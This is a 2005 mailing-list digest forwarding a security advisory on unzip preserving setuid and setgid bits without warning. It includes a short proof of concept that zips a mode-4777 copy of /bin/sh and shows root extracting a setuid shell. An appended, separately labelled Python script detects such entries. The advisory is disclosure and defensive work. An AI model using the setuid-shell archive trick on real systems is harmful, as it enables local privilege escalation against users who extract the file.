[Please upgrade unzip/zip on all platforms -- Raju]

This is an RFC 1153 digest.
(1 message)
----------------------------------------------------------------------

Message-Id: <[EMAIL PROTECTED]>
From: Albert Puigsech Galicia <[EMAIL PROTECTED]>
To: bugtraq@securityfocus.com
Subject: 7a69Adv#22 - UNIX unzip keep setuid and setgid files
Date: Mon, 28 Feb 2005 13:17:02 +0000

------------------------------------------------------------------
                  7a69ezine Advisories                 7a69Adv#22
------------------------------------------------------------------
  http://www.7a69ezine.org                            [26/01/2005]
------------------------------------------------------------------

Title:      Unzip keep setuid and setgid files
Author:     Albert Puigsech Galicia - <[EMAIL PROTECTED]>
Software:   Unzip
Versions:   >= 5.51
Remote:     No
Exploit:    yes
Severity:   Low/Medium

------------------------------------------------------------------

I. Introduction.

UnZip is an extraction utility for archives compressed in .zip format. It's compatible with PKWARE's PKZIP and PKUNZIP utilities for MS-DOS. The primary objectives have been portability and non-MSDOS functionality.

More info about unzip on http://www.info-zip.org/pub/infozip/UnZip.html.

II. Description.

The unzip UNIX functionality allows you to maintain file permissions in compressed files, and of course that includes the setuid bit. Because it does not show a warning message before unpacking a setuid file, it is possible to create a malicious ZIP file that creates an executable setuid.

III. Exploit

It's really easy to test this vulnerability. You can create a malicious ZIP file following this example:

    $ cp /bin/sh .
    $ chmod 4777 sh
    $ zip malicious.zip sh

When another user (including root) unpacks the file, a setuid shell file will be created without any warning, as you can see here:

    # id
    # unzip malicious.zip
    Archive:  malicious.zip
      inflating: sh
    # ls -l sh
    -rwsrwxrwx  1 root root 705148 Jan 16 17:04 sh

Of course you need a local account on the system to execute the file, so it's not a remote vulnerability.

IV. Patch

Upgrade to unzip 5.52.

V. Timeline

12/01/2005 - Bug discovered
16/01/2005 - Vendor contacted
21/01/2005 - Vendor response
25/01/2005 - Vendor patch provided
28/02/2005 - New version published
28/02/2005 - Advisory published

VI. Extra data

You can find more 7a69ezine advisories at the following link:

http://www.7a69ezine.org/avisos/propios [spanish info]

------------------------------

End of this Digest
******************

--
Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/
GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F
It is the mind that moves
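
Added example, not part of the original advisory or digest: a pre-extraction check that reads the Unix mode stored in each ZIP entry and reports entries carrying the setuid or setgid bit, the condition the advisory describes. The function names and the in-memory sample archive are constructed for illustration.

```python
import io
import stat
import zipfile

# Permission bits the advisory is concerned with.
SPECIAL_BITS = stat.S_ISUID | stat.S_ISGID


def audit_zip(source):
    """Return [(name, mode_string)] for entries stored with setuid/setgid bits.

    Archives written on Unix keep the file's st_mode in the high 16 bits of
    the external attributes field of each central directory entry.
    """
    flagged = []
    with zipfile.ZipFile(source) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16
            if mode & SPECIAL_BITS:
                flagged.append((info.filename, stat.filemode(mode)))
    return flagged


def build_sample_zip():
    """Constructed sample: one entry stored as mode 4777, one as mode 644."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        suid = zipfile.ZipInfo("sh")
        suid.create_system = 3  # 3 = Unix
        suid.external_attr = (stat.S_IFREG | 0o4777) << 16
        zf.writestr(suid, b"placeholder bytes, not a real binary")

        plain = zipfile.ZipInfo("README")
        plain.create_system = 3
        plain.external_attr = (stat.S_IFREG | 0o644) << 16
        zf.writestr(plain, b"hello")
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for name, mode in audit_zip(build_sample_zip()):
        print(f"{mode}  {name}")
```

audit_zip also accepts a filesystem path, so it can be run against a downloaded archive before it is unpacked by a privileged user.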